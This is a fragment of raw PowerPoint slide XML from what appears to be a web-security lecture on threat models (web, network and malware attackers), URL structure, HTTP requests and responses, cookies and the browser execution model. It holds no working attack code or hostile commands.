          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4800600" y="2778125"/>
              <a:ext cx="1155700" cy="1276350"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -200975"/>
                <a:gd name="adj2" fmla="val 175085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3330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" name="Title 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="7772400" cy="9144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security threat model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76200"/>
            <a:ext cx="8861426" cy="3560957"/>
            <a:chOff x="228600" y="1905000"/>
            <a:chExt cx="8753475" cy="4762500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3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5638800" y="1981200"/>
              <a:ext cx="533400" cy="2000250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7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2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3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1"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6705600" y="4286251"/>
              <a:ext cx="2276475" cy="946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dirty="0"/>
                <a:t>Web Attacker</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10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11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15" name="Picture 11" descr="CompaqAlphaServerES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00600" y="2228850"/>
              <a:ext cx="1155700" cy="1420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28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3184525" y="2619375"/>
              <a:ext cx="10017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sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Cloud Callout 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3981450"/>
              <a:ext cx="1155700" cy="1276350"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -186846"/>
                <a:gd name="adj2" fmla="val 43949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8" name="Straight Connector 33"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="17" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000" flipV="1">
              <a:off x="4919662" y="3748088"/>
              <a:ext cx="492125" cy="1206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" name="Straight Connector 35"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4256088" y="4743450"/>
              <a:ext cx="457200" cy="17145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pic>
          <p:nvPicPr>
            <p:cNvPr id="20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20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="228599" y="3383471"/>
            <a:ext cx="8861425" cy="3443697"/>
            <a:chOff x="228600" y="1905000"/>
            <a:chExt cx="8839200" cy="4762500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Rectangle 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2895600" y="1976438"/>
              <a:ext cx="3276600" cy="3910012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2895600" y="3981450"/>
              <a:ext cx="533400" cy="1905000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/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5638800" y="1976438"/>
              <a:ext cx="533400" cy="2157412"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/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25" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7162800" y="1905000"/>
              <a:ext cx="1703388" cy="2357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 descr="Alice _8885 by Disney-Grandpa."/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="228600" y="3886200"/>
              <a:ext cx="16002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11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6927850" y="4286251"/>
              <a:ext cx="2139950" cy="978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Network Attacker</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="TextBox 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="533400" y="6267450"/>
              <a:ext cx="7112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Alice</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Right Arrow 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2057400" y="43434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Right Arrow 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2057400" y="52578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6699FF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Right Arrow 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6324600" y="23622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Right Arrow 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6324600" y="3276600"/>
              <a:ext cx="685800" cy="4572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3300"/>
            </a:solidFill>
            <a:ln w="12700" algn="ctr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pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 11" descr="CompaqAlphaServerES4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76600" y="2255838"/>
              <a:ext cx="1155700" cy="1420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28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4954588" y="4743450"/>
              <a:ext cx="10017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System</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="35" name="Straight Connector 33"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="4432300" y="2967038"/>
              <a:ext cx="488950" cy="3032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36" name="Straight Connector 35"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="4242594" y="3899694"/>
              <a:ext cx="1028700" cy="1001712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37" name="Cloud Callout 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4800600" y="2778125"/>
              <a:ext cx="1155700" cy="1276350"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -200975"/>
                <a:gd name="adj2" fmla="val 175085"/>
              </a:avLst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38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8000" y="4252913"/>
              <a:ext cx="1436688" cy="143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26856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Threat Models</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14510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53000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can obtain SSL/TLS certificate for attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User visits attacker.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Or: runs attacker’s Facebook app, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passive: Wireless eavesdropper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Active: Evil router, DNS poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker escapes browser isolation mechanisms and run separately under control of OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451012" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1600200"/>
            <a:ext cx="0" cy="480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attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1432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Browsers may contain exploitable bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often enable remote code execution by web sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google study:     [the ghost in the browser 2007]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found Trojans on 300,000 web pages (URLs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Found adware on 18,000 web pages (URLs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Even if browsers were bug-free, still lots of vulnerabilities on the web</a:t>
            </a:r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 of the vulnerabilities on previous graph: XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, CSRF, …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723543" y="3790890"/>
            <a:ext cx="521065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OUR FOCUS IN THIS PART OF COURSE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Rendering content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Security User Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frames and frame busting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URLs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13527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72400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Global identifiers of network-retrievable documents </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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http://stanford.edu:81/class?name=cs155#homework</a:t>
            </a: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Special characters are encoded as hex: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%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = newline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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = space, %2B = +  (special exception)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858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1371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Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="2855913"/>
            <a:ext cx="246063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Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="2855913"/>
            <a:ext cx="609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10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="2855913"/>
            <a:ext cx="1371600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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="2855913"/>
            <a:ext cx="1387475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AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="103188" y="353536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145833"/>
              <a:gd name="adj4" fmla="val 11406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Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24587" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="4262438"/>
            <a:ext cx="1143000" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -364361"/>
              <a:gd name="adj4" fmla="val 13236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Hostname</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2151063" y="4379913"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -413694"/>
              <a:gd name="adj4" fmla="val 98472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Port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24589" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4294188" y="4370388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22736"/>
              <a:gd name="adj4" fmla="val -76079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Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24590" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6315075" y="4533900"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -476426"/>
              <a:gd name="adj4" fmla="val -14875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Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24591" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3810000"/>
            <a:ext cx="1292225" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -194444"/>
              <a:gd name="adj4" fmla="val -5442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triangle" w="lg" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400"/>
              <a:t>Fragment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2241550"/>
            <a:ext cx="8305800" cy="2670175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080">
              <a:alpha val="2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GET /index.html HTTP/1.1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Accept: image/gif, image/x-bitmap, image/jpeg, */*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Accept-Language: en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr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User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)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Host: www.example.com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Referer: http://www.google.com?q=dingbats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49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Request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09600" y="1600200"/>
            <a:ext cx="996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Method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057400" y="1600200"/>
            <a:ext cx="577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File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200400" y="160020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6631" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9906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>
            <a:off x="2362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3886200" y="1924050"/>
            <a:ext cx="0" cy="280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7620000" y="160020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H="1">
            <a:off x="7391400" y="1976438"/>
            <a:ext cx="60960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600200" y="5272088"/>
            <a:ext cx="23812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 – none for GET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H="1" flipV="1">
            <a:off x="838200" y="4733925"/>
            <a:ext cx="7620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3200400" y="4905375"/>
            <a:ext cx="1263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Blank line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H="1" flipV="1">
            <a:off x="838200" y="4429125"/>
            <a:ext cx="2362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54768" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="595313" y="6019800"/>
            <a:ext cx="8120493" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175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/>
              <a:t>GET :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>no side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>effect           POST :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>possible side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>effect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54075" y="2589213"/>
            <a:ext cx="7086600" cy="2862262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080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HTTP/1.0 200 OK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Date: Sun, 21 Apr 1996 02:20:42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Server: Microsoft-Internet-Information-Server/5.0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Connection: keep-alive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Content-Type: text/html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Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT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Set-Cookie: …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Content-Length: 2543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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; Some data... blah, blah, blah &lt;/HTML&gt;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HTTP Response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77875" y="1619250"/>
            <a:ext cx="16573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HTTP version</a:t>
            </a:r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>
            <a:off x="1539875" y="1943100"/>
            <a:ext cx="0" cy="533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597150" y="1619250"/>
            <a:ext cx="1479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Status code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237037" y="1619250"/>
            <a:ext cx="1822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Reason phrase</a:t>
            </a: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H="1">
            <a:off x="2530475" y="1943100"/>
            <a:ext cx="685800" cy="661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3063875" y="1943100"/>
            <a:ext cx="1676400" cy="738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7483475" y="1695450"/>
            <a:ext cx="1085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Headers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>
            <a:off x="6569075" y="2019300"/>
            <a:ext cx="1371600" cy="10429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8199437" y="3671888"/>
            <a:ext cx="6794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 b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data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H="1">
            <a:off x="7050087" y="4052888"/>
            <a:ext cx="145415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2400" y="5772150"/>
            <a:ext cx="11826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b="1"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27663" name="Freeform 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="344487" y="4400550"/>
            <a:ext cx="434975" cy="1460500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169607 w 435078"/>
              <a:gd name="T1" fmla="*/ 1460090 h 1460090"/>
              <a:gd name="T2" fmla="*/ 36872 w 435078"/>
              <a:gd name="T3" fmla="*/ 589936 h 1460090"/>
              <a:gd name="T4" fmla="*/ 66368 w 435078"/>
              <a:gd name="T5" fmla="*/ 117987 h 1460090"/>
              <a:gd name="T6" fmla="*/ 435078 w 435078"/>
              <a:gd name="T7" fmla="*/ 0 h 1460090"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 435078"/>
              <a:gd name="T13" fmla="*/ 0 h 1460090"/>
              <a:gd name="T14" fmla="*/ 435078 w 435078"/>
              <a:gd name="T15" fmla="*/ 1460090 h 14600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5078" h="1460090">
                <a:moveTo>
                  <a:pt x="169607" y="1460090"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="111843" y="1136855"/>
                  <a:pt x="54079" y="813620"/>
                  <a:pt x="36872" y="589936"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19665" y="366252"/>
                  <a:pt x="0" y="216310"/>
                  <a:pt x="66368" y="117987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132736" y="19664"/>
                  <a:pt x="283907" y="9832"/>
                  <a:pt x="43507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/>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Time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04800"/>
            <a:ext cx="9257919" cy="586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78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Content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Rendering and events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203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Basic browser execution model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each browser window or frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loads content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Renders it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Processes HTML and scripts to display page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May involve images, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>subframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Responds to events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Events can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User actions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OnClick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OnMouseover</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rendering: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OnLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OnBeforeUnload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Timing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
